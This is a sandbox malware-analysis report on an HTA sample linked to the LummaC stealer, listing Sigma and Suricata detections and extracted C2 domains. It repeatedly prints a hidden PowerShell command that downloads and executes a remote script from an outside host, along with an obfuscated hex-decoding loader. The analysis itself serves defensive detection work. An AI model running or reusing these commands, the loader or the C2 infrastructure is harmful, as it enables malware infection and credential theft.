"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function cDnCn($pBla){return -split ($pBla -replace '..', '0x$& ')};$Lhmk = cDnCn('A3AA4480FF655084E70ADC84D9EA6341178CCA80AF8469B12931F471AF827F36734F649E4FFC481465F7A8A2BFA75783C467F30497BC4B11E481C2530797B14FC2F5B368B22016A880E652482E6475CF0DC1A66EA8F0136B2BBC629A30CEB860956FD49362AEC1529369252FC290E7464876570EB817D8E9B180D541376938391A342371D8EEE7C40B429917ED3BAE7546609A8390B670A9097CB2F4371F68C266424FC610C85C530E515400B772D500AE542F889F9A970F0C0884F9DAB2F28BCD379149C803B7F17EEC6C69E622BA1F8B13247111CF1CCB79B4798B7DFB6AEC68A8F963D9FE6AC1AF1987A9FB2A16B0F82B9BA594307ADEEA757F6284F08DDB1A3BFA98B3BEA493C2C605A6EBF27BFDF963BEF1C0F74C61BB82B80E6A9B2F61E44AC18908A15AC5CA52E0D0B5E7ECA5C629F9CE088140C02670105B1C1EB4C39C449DED3A8E098E14832E1159B7BFE7F74012F5AB28A812BD11B0830216EC8E5F537AD27755CAD7EFBDAEB4C5E6235233729039ACA656A57FB2D8AFEF2960E070779A4CF1BD35291B7033D4618B7FBEC36B04BDD9CC6D825285FE8E9B14F783B7F3071ABE49F6BE8DFE02D7E8B0A4E5FEAD8570B4049362BC3FF9599BEF08430DEA16A596C8E8AA8FEBE25A7D3AEF1A0F1D2A47644C59B18A95C4E955B6A747C547978A1471BD6004B1ECD6443ABC8058ED921C2A97C1449AE376C36FB9DA81ED841F3F4437F69417CEF04ACD68C114464AA5755262E3E2A8804F5D1F018C94308E1802E6C59864386DF18AC9D197902C482A57D3531FCB49886B15046AF78768F80014DE486E0E78D49561586C41C0E653A2A6BB84F1D7467BB73BF1E6FF73E92540FCC809AA398E26B9A708706094D4A5382850472779AD17B69C066B29CAAE8B04F605E50CC29E8480DD31E8DB08E7717139D5A19EE210804AD16CA1445A2EAC4D7C66209914C86431F3B5174ECE947BEBD88F70D5299D63C267D52D0EA77D645EBCDD39A110138C082CD3C09CA8AA75E9A53A689D0576C332EE23948AE9ECCCE522DACC38B3581F9C71CFC27C56F81F9CB5C9D938E2A35C15A5E7CE4C1DB70B003BF969AB7131336F933529CEA80A9FACB8C911FDA0C526986D4E8FB5FDDDA4C0DF5762BE3783933E8E0AB3D712CD3B563309BDB03A5460E12D1C34126A4F89191E1C34197F7EB35212BAA7E9D32890ED00618DFED16C97F2F709899CAEA84C4AA2A7B5371A5FACA3D115E12BE56D873196999184299302AD235C87C226989D2CBEBA4D82E6C270F060D4165DE6962A5077677A4796A0FC82E05AAB1272F50397568327381A2D529A9466317AB38D192E338BDA14927384DF7CCBAFF9E8594748246285B3D8AA54C12D8C53351947654EA52F7B1A29724A48C14A1D4FCAD70EDC954B5D82A932AC8FF8A2DCB79D1C10C7458B14A40215396E306C046B7DD83B83B6EB6FFAE26FF38DE7E40F09DE9FDD00EC21F89B23814EBBD7E5B2A5AA1A2C0CC6814E4C15D1272
                Sigma detected: PowerShell Web Download
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://journal.liveview.pw/singl6.vsdx'))" , CommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://journal.liveview.pw/singl6.vsdx'))" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function cDnCn($pBla){return -split ($pBla -replace '..', '0x$& ')};$Lhmk = cDnCn('A3AA4480FF655084E70ADC84D9EA6341178CCA80AF8469B12931F471AF827F36734F649E4FFC481465F7A8A2BFA75783C467F30497BC4B11E481C2530797B14FC2F5B368B22016A880E652482E6475CF0DC1A66EA8F0136B2BBC629A30CEB860956FD49362AEC1529369252FC290E7464876570EB817D8E9B180D541376938391A342371D8EEE7C40B429917ED3BAE7546609A8390B670A9097CB2F4371F68C266424FC610C85C530E515400B772D500AE542F889F9A970F0C0884F9DAB2F28BCD379149C803B7F17EEC6C69E622BA1F8B13247111CF1CCB79B4798B7DFB6AEC68A8F963D9FE6AC1AF1987A9FB2A16B0F82B9BA594307ADEEA757F6284F08DDB1A3BFA98B3BEA493C2C605A6EBF27BFDF963BEF1C0F74C61BB82B80E6A9B2F61E44AC18908A15AC5CA52E0D0B5E7ECA5C629F9CE088140C02670105B1C1EB4C39C449DED3A8E098E14832E1159B7BFE7F74012F5AB28A812BD11B0830216EC8E5F537AD27755CAD7EFBDAEB4C5E6235233729039ACA656A57FB2D8AFEF2960E070779A4CF1BD35291B7033D4618B7FBEC36B04BDD9CC6D825285FE8E9B14F783B7F3071ABE49F6BE8DFE02D7E8B0A4E5FEAD8570B4049362BC3FF9599BEF08430DEA16A596C8E8AA8FEBE25A7D3AEF1A0F1D2A47644C59B18A95C4E955B6A747C547978A1471BD6004B1ECD6443ABC8058ED921C2A97C1449AE376C36FB9DA81ED841F3F4437F69417CEF04ACD68C114464AA5755262E3E2A8804F5D1F018C94308E1802E6C59864386DF18AC9D197902C482A57D3531FCB49886B15046AF78768F80014DE486E0E78D49561586C41C0E653A2A6BB84F1D7467BB73BF1E6FF73E92540FCC809AA398E26B9A708706094D4A5382850472779AD17B69C066B29CAAE8B04F605E50CC29E8480DD31E8DB08E7717139D5A19EE210804AD16CA1445A2EAC4D7C66209914C86431F3B5174ECE947BEBD88F70D5299D63C267D52D0EA77D645EBCDD39A110138C082CD3C09CA8AA75E9A53A689D0576C332EE23948AE9ECCCE522DACC38B3581F9C71CFC27C56F81F9CB5C9D938E2A35C15A5E7CE4C1DB70B003BF969AB7131336F933529CEA80A9FACB8C911FDA0C526986D4E8FB5FDDDA4C0DF5762BE3783933E8E0AB3D712CD3B563309BDB03A5460E12D1C34126A4F89191E1C34197F7EB35212BAA7E9D32890ED00618DFED16C97F2F709899CAEA84C4AA2A7B5371A5FACA3D115E12BE56D873196999184299302AD235C87C226989D2CBEBA4D82E6C270F060D4165DE6962A5077677A4796A0FC82E05AAB1272F50397568327381A2D529A9466317AB38D192E338BDA14927384DF7CCBAFF9E8594748246285B3D8AA54C12D8C53351947654EA52F7B1A29724A48C14A1D4FCAD70EDC954B5D82A932AC8FF8A2DCB79D1C10C7458B14A40215396E306C046B7DD83B83B6EB6FFAE26FF38DE7E40F09DE9FDD00EC21F89B23814EBBD7E5B2A5AA1A2C0CC6814E4C15D1272
                Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
                Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://journal.liveview.pw/singl6.vsdx'))" , CommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://journal.liveview.pw/singl6.vsdx'))" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function cDnCn($pBla){return -split ($pBla -replace '..', '0x$& ')};$Lhmk = cDnCn('A3AA4480FF655084E70ADC84D9EA6341178CCA80AF8469B12931F471AF827F36734F649E4FFC481465F7A8A2BFA75783C467F30497BC4B11E481C2530797B14FC2F5B368B22016A880E652482E6475CF0DC1A66EA8F0136B2BBC629A30CEB860956FD49362AEC1529369252FC290E7464876570EB817D8E9B180D541376938391A342371D8EEE7C40B429917ED3BAE7546609A8390B670A9097CB2F4371F68C266424FC610C85C530E515400B772D500AE542F889F9A970F0C0884F9DAB2F28BCD379149C803B7F17EEC6C69E622BA1F8B13247111CF1CCB79B4798B7DFB6AEC68A8F963D9FE6AC1AF1987A9FB2A16B0F82B9BA594307ADEEA757F6284F08DDB1A3BFA98B3BEA493C2C605A6EBF27BFDF963BEF1C0F74C61BB82B80E6A9B2F61E44AC18908A15AC5CA52E0D0B5E7ECA5C629F9CE088140C02670105B1C1EB4C39C449DED3A8E098E14832E1159B7BFE7F74012F5AB28A812BD11B0830216EC8E5F537AD27755CAD7EFBDAEB4C5E6235233729039ACA656A57FB2D8AFEF2960E070779A4CF1BD35291B7033D4618B7FBEC36B04BDD9CC6D825285FE8E9B14F783B7F3071ABE49F6BE8DFE02D7E8B0A4E5FEAD8570B4049362BC3FF9599BEF08430DEA16A596C8E8AA8FEBE25A7D3AEF1A0F1D2A47644C59B18A95C4E955B6A747C547978A1471BD6004B1ECD6443ABC8058ED921C2A97C1449AE376C36FB9DA81ED841F3F4437F69417CEF04ACD68C114464AA5755262E3E2A8804F5D1F018C94308E1802E6C59864386DF18AC9D197902C482A57D3531FCB49886B15046AF78768F80014DE486E0E78D49561586C41C0E653A2A6BB84F1D7467BB73BF1E6FF73E92540FCC809AA398E26B9A708706094D4A5382850472779AD17B69C066B29CAAE8B04F605E50CC29E8480DD31E8DB08E7717139D5A19EE210804AD16CA1445A2EAC4D7C66209914C86431F3B5174ECE947BEBD88F70D5299D63C267D52D0EA77D645EBCDD39A110138C082CD3C09CA8AA75E9A53A689D0576C332EE23948AE9ECCCE522DACC38B3581F9C71CFC27C56F81F9CB5C9D938E2A35C15A5E7CE4C1DB70B003BF969AB7131336F933529CEA80A9FACB8C911FDA0C526986D4E8FB5FDDDA4C0DF5762BE3783933E8E0AB3D712CD3B563309BDB03A5460E12D1C34126A4F89191E1C34197F7EB35212BAA7E9D32890ED00618DFED16C97F2F709899CAEA84C4AA2A7B5371A5FACA3D115E12BE56D873196999184299302AD235C87C226989D2CBEBA4D82E6C270F060D4165DE6962A5077677A4796A0FC82E05AAB1272F50397568327381A2D529A9466317AB38D192E338BDA14927384DF7CCBAFF9E8594748246285B3D8AA54C12D8C53351947654EA52F7B1A29724A48C14A1D4FCAD70EDC954B5D82A932AC8FF8A2DCB79D1C10C7458B14A40215396E306C046B7DD83B83B6EB6FFAE26FF38DE7E40F09DE9FDD00EC21F89B23814EBBD7E5B2A5AA1A2C0CC6814E4C15D1272
                Sigma detected: Usage Of Web Request Commands And Cmdlets
                Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://journal.liveview.pw/singl6.vsdx'))" , CommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://journal.liveview.pw/singl6.vsdx'))" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function cDnCn($pBla){return -split ($pBla -replace '..', '0x$& ')};$Lhmk = cDnCn('A3AA4480FF655084E70ADC84D9EA6341178CCA80AF8469B12931F471AF827F36734F649E4FFC481465F7A8A2BFA75783C467F30497BC4B11E481C2530797B14FC2F5B368B22016A880E652482E6475CF0DC1A66EA8F0136B2BBC629A30CEB860956FD49362AEC1529369252FC290E7464876570EB817D8E9B180D541376938391A342371D8EEE7C40B429917ED3BAE7546609A8390B670A9097CB2F4371F68C266424FC610C85C530E515400B772D500AE542F889F9A970F0C0884F9DAB2F28BCD379149C803B7F17EEC6C69E622BA1F8B13247111CF1CCB79B4798B7DFB6AEC68A8F963D9FE6AC1AF1987A9FB2A16B0F82B9BA594307ADEEA757F6284F08DDB1A3BFA98B3BEA493C2C605A6EBF27BFDF963BEF1C0F74C61BB82B80E6A9B2F61E44AC18908A15AC5CA52E0D0B5E7ECA5C629F9CE088140C02670105B1C1EB4C39C449DED3A8E098E14832E1159B7BFE7F74012F5AB28A812BD11B0830216EC8E5F537AD27755CAD7EFBDAEB4C5E6235233729039ACA656A57FB2D8AFEF2960E070779A4CF1BD35291B7033D4618B7FBEC36B04BDD9CC6D825285FE8E9B14F783B7F3071ABE49F6BE8DFE02D7E8B0A4E5FEAD8570B4049362BC3FF9599BEF08430DEA16A596C8E8AA8FEBE25A7D3AEF1A0F1D2A47644C59B18A95C4E955B6A747C547978A1471BD6004B1ECD6443ABC8058ED921C2A97C1449AE376C36FB9DA81ED841F3F4437F69417CEF04ACD68C114464AA5755262E3E2A8804F5D1F018C94308E1802E6C59864386DF18AC9D197902C482A57D3531FCB49886B15046AF78768F80014DE486E0E78D49561586C41C0E653A2A6BB84F1D7467BB73BF1E6FF73E92540FCC809AA398E26B9A708706094D4A5382850472779AD17B69C066B29CAAE8B04F605E50CC29E8480DD31E8DB08E7717139D5A19EE210804AD16CA1445A2EAC4D7C66209914C86431F3B5174ECE947BEBD88F70D5299D63C267D52D0EA77D645EBCDD39A110138C082CD3C09CA8AA75E9A53A689D0576C332EE23948AE9ECCCE522DACC38B3581F9C71CFC27C56F81F9CB5C9D938E2A35C15A5E7CE4C1DB70B003BF969AB7131336F933529CEA80A9FACB8C911FDA0C526986D4E8FB5FDDDA4C0DF5762BE3783933E8E0AB3D712CD3B563309BDB03A5460E12D1C34126A4F89191E1C34197F7EB35212BAA7E9D32890ED00618DFED16C97F2F709899CAEA84C4AA2A7B5371A5FACA3D115E12BE56D873196999184299302AD235C87C226989D2CBEBA4D82E6C270F060D4165DE6962A5077677A4796A0FC82E05AAB1272F50397568327381A2D529A9466317AB38D192E338BDA14927384DF7CCBAFF9E8594748246285B3D8AA54C12D8C53351947654EA52F7B1A29724A48C14A1D4FCAD70EDC954B5D82A932AC8FF8A2DCB79D1C10C7458B14A40215396E306C046B7DD83B83B6EB6FFAE26FF38DE7E40F09DE9FDD00EC21F89B23814EBBD7E5B2A5AA1A2C0CC6814E4C15D1272
                Sigma detected: Non Interactive PowerShell Process Spawned
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function cDnCn($pBla){return -split ($pBla -replace '..', '0x$& ')};$Lhmk = cDnCn('A3AA4480FF655084E70ADC84D9EA6341178CCA80AF8469B12931F471AF827F36734F649E4FFC481465F7A8A2BFA75783C467F30497BC4B11E481C2530797B14FC2F5B368B22016A880E652482E6475CF0DC1A66EA8F0136B2BBC629A30CEB860956FD49362AEC1529369252FC290E7464876570EB817D8E9B180D541376938391A342371D8EEE7C40B429917ED3BAE7546609A8390B670A9097CB2F4371F68C266424FC610C85C530E515400B772D500AE542F889F9A970F0C0884F9DAB2F28BCD379149C803B7F17EEC6C69E622BA1F8B13247111CF1CCB79B4798B7DFB6AEC68A8F963D9FE6AC1AF1987A9FB2A16B0F82B9BA594307ADEEA757F6284F08DDB1A3BFA98B3BEA493C2C605A6EBF27BFDF963BEF1C0F74C61BB82B80E6A9B2F61E44AC18908A15AC5CA52E0D0B5E7ECA5C629F9CE088140C02670105B1C1EB4C39C449DED3A8E098E14832E1159B7BFE7F74012F5AB28A812BD11B0830216EC8E5F537AD27755CAD7EFBDAEB4C5E6235233729039ACA656A57FB2D8AFEF2960E070779A4CF1BD35291B7033D4618B7FBEC36B04BDD9CC6D825285FE8E9B14F783B7F3071ABE49F6BE8DFE02D7E8B0A4E5FEAD8570B4049362BC3FF9599BEF08430DEA16A596C8E8AA8FEBE25A7D3AEF1A0F1D2A47644C59B18A95C4E955B6A747C547978A1471BD6004B1ECD6443ABC8058ED921C2A97C1449AE376C36FB9DA81ED841F3F4437F69417CEF04ACD68C114464AA5755262E3E2A8804F5D1F018C94308E1802E6C59864386DF18AC9D197902C482A57D3531FCB49886B15046AF78768F80014DE486E0E78D49561586C41C0E653A2A6BB84F1D7467BB73BF1E6FF73E92540FCC809AA398E26B9A708706094D4A5382850472779AD17B69C066B29CAAE8B04F605E50CC29E8480DD31E8DB08E7717139D5A19EE210804AD16CA1445A2EAC4D7C66209914C86431F3B5174ECE947BEBD88F70D5299D63C267D52D0EA77D645EBCDD39A110138C082CD3C09CA8AA75E9A53A689D0576C332EE23948AE9ECCCE522DACC38B3581F9C71CFC27C56F81F9CB5C9D938E2A35C15A5E7CE4C1DB70B003BF969AB7131336F933529CEA80A9FACB8C911FDA0C526986D4E8FB5FDDDA4C0DF5762BE3783933E8E0AB3D712CD3B563309BDB03A5460E12D1C34126A4F89191E1C34197F7EB35212BAA7E9D32890ED00618DFED16C97F2F709899CAEA84C4AA2A7B5371A5FACA3D115E12BE56D873196999184299302AD235C87C226989D2CBEBA4D82E6C270F060D4165DE6962A5077677A4796A0FC82E05AAB1272F50397568327381A2D529A9466317AB38D192E338BDA14927384DF7CCBAFF9E8594748246285B3D8AA54C12D8C53351947654EA52F7B1A29724A48C14A1D4FCAD70EDC954B5D82A932AC8FF8A2DCB79D1C10C7458B14A40215396E306C046B7DD83B83B6EB6FFAE26FF38DE7E40F09DE9FDD00EC21F89B23814EBBD7E5B2A5AA1A2C0CC6814E4C15D127261B29720A28F854382CC18092685037C23B14ED11E90915036D385992F5D948F9775BB8B9C159C5C39C63E68221BF35A5518331151C4C0BACB7B58F5A8B9DF32BD1C3C4828D65896C8DC07B8002C812E8FED5F8FE86A6138586B9DC1F40F9A4E967D8E87CD674633563F6514E3557D8EFDE3A0247843CCA695357E876D6F77804DCB5599681DA62FAED5D52BA3AB823A2D2219C0783C18FBD3FC8897A07B5FEA483FF46AF5F23EB91E20E31A520B6566B846C91212DECBB9F2E6972ADCAB84A64D2DC6EBFA7B5758A915C3A978589C931CEFE5B8868B0256407FA6B78E518E0B7D7A8042BD51A46F9297518C6F4EB262D6525B016FB7D858136FCBF7AF2BC0D0488BEFD0CED9A5213FF3FF1B7B481CB6454CC9C929EDF1779EEFB9842B90ED62994AE6BD859C94C0821F219C5A77E00C97981C5B1F965E0977F82C3EC531C343E27EEC5C4191D27011B33568FE6B0ECE385FE81FF1
                Sigma detected: Potential Encoded PowerShell Patterns In CommandLine
                Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function cDnCn($pBla){return -split ($pBla -replace '..', '0x$& ')};$Lhmk = cDnCn('A3AA4480FF655084E70ADC84D9EA6341178CCA80AF8469B12931F471AF827F36734F649E4FFC481465F7A8A2BFA75783C467F30497BC4B11E481C2530797B14FC2F5B368B22016A880E652482E6475CF0DC1A66EA8F0136B2BBC629A30CEB860956FD49362AEC1529369252FC290E7464876570EB817D8E9B180D541376938391A342371D8EEE7C40B429917ED3BAE7546609A8390B670A9097CB2F4371F68C266424FC610C85C530E515400B772D500AE542F889F9A970F0C0884F9DAB2F28BCD379149C803B7F17EEC6C69E622BA1F8B13247111CF1CCB79B4798B7DFB6AEC68A8F963D9FE6AC1AF1987A9FB2A16B0F82B9BA594307ADEEA757F6284F08DDB1A3BFA98B3BEA493C2C605A6EBF27BFDF963BEF1C0F74C61BB82B80E6A9B2F61E44AC18908A15AC5CA52E0D0B5E7ECA5C629F9CE088140C02670105B1C1EB4C39C449DED3A8E098E14832E1159B7BFE7F74012F5AB28A812BD11B0830216EC8E5F537AD27755CAD7EFBDAEB4C5E6235233729039ACA656A57FB2D8AFEF2960E070779A4CF1BD35291B7033D4618B7FBEC36B04BDD9CC6D825285FE8E9B14F783B7F3071ABE49F6BE8DFE02D7E8B0A4E5FEAD8570B4049362BC3FF9599BEF08430DEA16A596C8E8AA8FEBE25A7D3AEF1A0F1D2A47644C59B18A95C4E955B6A747C547978A1471BD6004B1ECD6443ABC8058ED921C2A97C1449AE376C36FB9DA81ED841F3F4437F69417CEF04ACD68C114464AA5755262E3E2A8804F5D1F018C94308E1802E6C59864386DF18AC9D197902C482A57D3531FCB49886B15046AF78768F80014DE486E0E78D49561586C41C0E653A2A6BB84F1D7467BB73BF1E6FF73E92540FCC809AA398E26B9A708706094D4A5382850472779AD17B69C066B29CAAE8B04F605E50CC29E8480DD31E8DB08E7717139D5A19EE210804AD16CA1445A2EAC4D7C66209914C86431F3B5174ECE947BEBD88F70D5299D63C267D52D0EA77D645EBCDD39A110138C082CD3C09CA8AA75E9A53A689D0576C332EE23948AE9ECCCE522DACC38B3581F9C71CFC27C56F81F9CB5C9D938E2A35C15A5E7CE4C1DB70B003BF969AB7131336F933529CEA80A9FACB8C911FDA0C526986D4E8FB5FDDDA4C0DF5762BE3783933E8E0AB3D712CD3B563309BDB03A5460E12D1C34126A4F89191E1C34197F7EB35212BAA7E9D32890ED00618DFED16C97F2F709899CAEA84C4AA2A7B5371A5FACA3D115E12BE56D873196999184299302AD235C87C226989D2CBEBA4D82E6C270F060D4165DE6962A5077677A4796A0FC82E05AAB1272F50397568327381A2D529A9466317AB38D192E338BDA14927384DF7CCBAFF9E8594748246285B3D8AA54C12D8C53351947654EA52F7B1A29724A48C14A1D4FCAD70EDC954B5D82A932AC8FF8A2DCB79D1C10C7458B14A40215396E306C046B7DD83B83B6EB6FFAE26FF38DE7E40F09DE9FDD00EC21F89B23814EBBD7E5B2A5AA1A2C0CC6814E4C15D127261B29720A28F854382CC18092685037C23B14ED11E90915036D385992F5D948F9775BB8B9C159C5C39C63E68221BF35A5518331151C4C0BACB7B58F5A8B9DF32BD1C3C4828D65896C8DC07B8002C812E8FED5F8FE86A6138586B9DC1F40F9A4E967D8E87CD674633563F6514E3557D8EFDE3A0247843CCA695357E876D6F77804DCB5599681DA62FAED5D52BA3AB823A2D2219C0783C18FBD3FC8897A07B5FEA483FF46AF5F23EB91E20E31A520B6566B846C91212DECBB9F2E6972ADCAB84A64D2DC6EBFA7B5758A915C3A978589C931CEFE5B8868B0256407FA6B78E518E0B7D7A8042BD51A46F9297518C6F4EB262D6525B016FB7D858136FCBF7AF2BC0D0488BEFD0CED9A5213FF3FF1B7B481CB6454CC9C929EDF1779EEFB9842B90ED62994AE6BD859C94C0821F219C5A77E00C97981C5B1F965E0977F82C3EC531C343E27EEC5C4191D27011B33568FE6B0ECE385FE81FF1

                Data Obfuscation

                barindex
                Sigma detected: Powershell Download and Execute IEX
                Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://journal.liveview.pw/singl6.vsdx'))" , CommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://journal.liveview.pw/singl6.vsdx'))" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function cDnCn($pBla){return -split ($pBla -replace '..', '0x$& ')};$Lhmk = cDnCn('A3AA4480FF655084E70ADC84D9EA6341178CCA80AF8469B12931F471AF827F36734F649E4FFC481465F7A8A2BFA75783C467F30497BC4B11E481C2530797B14FC2F5B368B22016A880E652482E6475CF0DC1A66EA8F0136B2BBC629A30CEB860956FD49362AEC1529369252FC290E7464876570EB817D8E9B180D541376938391A342371D8EEE7C40B429917ED3BAE7546609A8390B670A9097CB2F4371F68C266424FC610C85C530E515400B772D500AE542F889F9A970F0C0884F9DAB2F28BCD379149C803B7F17EEC6C69E622BA1F8B13247111CF1CCB79B4798B7DFB6AEC68A8F963D9FE6AC1AF1987A9FB2A16B0F82B9BA594307ADEEA757F6284F08DDB1A3BFA98B3BEA493C2C605A6EBF27BFDF963BEF1C0F74C61BB82B80E6A9B2F61E44AC18908A15AC5CA52E0D0B5E7ECA5C629F9CE088140C02670105B1C1EB4C39C449DED3A8E098E14832E1159B7BFE7F74012F5AB28A812BD11B0830216EC8E5F537AD27755CAD7EFBDAEB4C5E6235233729039ACA656A57FB2D8AFEF2960E070779A4CF1BD35291B7033D4618B7FBEC36B04BDD9CC6D825285FE8E9B14F783B7F3071ABE49F6BE8DFE02D7E8B0A4E5FEAD8570B4049362BC3FF9599BEF08430DEA16A596C8E8AA8FEBE25A7D3AEF1A0F1D2A47644C59B18A95C4E955B6A747C547978A1471BD6004B1ECD6443ABC8058ED921C2A97C1449AE376C36FB9DA81ED841F3F4437F69417CEF04ACD68C114464AA5755262E3E2A8804F5D1F018C94308E1802E6C59864386DF18AC9D197902C482A57D3531FCB49886B15046AF78768F80014DE486E0E78D49561586C41C0E653A2A6BB84F1D7467BB73BF1E6FF73E92540FCC809AA398E26B9A708706094D4A5382850472779AD17B69C066B29CAAE8B04F605E50CC29E8480DD31E8DB08E7717139D5A19EE210804AD16CA1445A2EAC4D7C66209914C86431F3B5174ECE947BEBD88F70D5299D63C267D52D0EA77D645EBCDD39A110138C082CD3C09CA8AA75E9A53A689D0576C332EE23948AE9ECCCE522DACC38B3581F9C71CFC27C56F81F9CB5C9D938E2A35C15A5E7CE4C1DB70B003BF969AB7131336F933529CEA80A9FACB8C911FDA0C526986D4E8FB5FDDDA4C0DF5762BE3783933E8E0AB3D712CD3B563309BDB03A5460E12D1C34126A4F89191E1C34197F7EB35212BAA7E9D32890ED00618DFED16C97F2F709899CAEA84C4AA2A7B5371A5FACA3D115E12BE56D873196999184299302AD235C87C226989D2CBEBA4D82E6C270F060D4165DE6962A5077677A4796A0FC82E05AAB1272F50397568327381A2D529A9466317AB38D192E338BDA14927384DF7CCBAFF9E8594748246285B3D8AA54C12D8C53351947654EA52F7B1A29724A48C14A1D4FCAD70EDC954B5D82A932AC8FF8A2DCB79D1C10C7458B14A40215396E306C046B7DD83B83B6EB6FFAE26FF38DE7E40F09DE9FDD00EC21F89B23814EBBD7E5B2A5AA1A2C0CC6814E4C15D1272

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-24T08:30:54.939000+010020283713Unknown Traffic192.168.2.649958104.21.64.1443TCP
                2024-12-24T08:30:56.919568+010020283713Unknown Traffic192.168.2.649964104.21.64.1443TCP
                2024-12-24T08:30:59.497997+010020283713Unknown Traffic192.168.2.649971104.21.64.1443TCP
                2024-12-24T08:31:01.655083+010020283713Unknown Traffic192.168.2.649976104.21.64.1443TCP
                2024-12-24T08:31:04.101207+010020283713Unknown Traffic192.168.2.649982104.21.64.1443TCP
                2024-12-24T08:31:06.366740+010020283713Unknown Traffic192.168.2.649989104.21.64.1443TCP
                2024-12-24T08:31:09.432037+010020283713Unknown Traffic192.168.2.649995104.21.64.1443TCP
                2024-12-24T08:31:13.036558+010020283713Unknown Traffic192.168.2.649996104.21.64.1443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-24T08:30:55.679946+010020546531A Network Trojan was detected192.168.2.649958104.21.64.1443TCP
                2024-12-24T08:30:57.972737+010020546531A Network Trojan was detected192.168.2.649964104.21.64.1443TCP
                2024-12-24T08:31:13.848961+010020546531A Network Trojan was detected192.168.2.649996104.21.64.1443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-24T08:30:55.679946+010020498361A Network Trojan was detected192.168.2.649958104.21.64.1443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-24T08:30:57.972737+010020498121A Network Trojan was detected192.168.2.649964104.21.64.1443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-24T08:31:07.135086+010020480941Malware Command and Control Activity Detected192.168.2.649989104.21.64.1443TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus detection for URL or domain
                Source: https://journal.liveview.pw/singl6.vsdxAvira URL Cloud: Label: malware
                Found malware configuration
                Source: 8.2.powershell.exe.430000.0.unpackMalware Configuration Extractor: LummaC {"C2 url": ["crosshuaht.lat", "energyaffai.lat", "discokeyus.lat", "sustainskelet.lat", "rapeflowwj.lat", "grannyejh.lat", "surmisehotte.click", "necklacebudi.lat", "aspecteirs.lat"], "Build id": "yJEcaG--singl6"}
                Multi AV Scanner detection for submitted file
                Source: singl6.mp4.htaVirustotal: Detection: 9%Perma Link
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.4% probability
                Sample uses string decryption to hide its real strings
                Source: 8.2.powershell.exe.430000.0.unpackString decryptor: rapeflowwj.lat
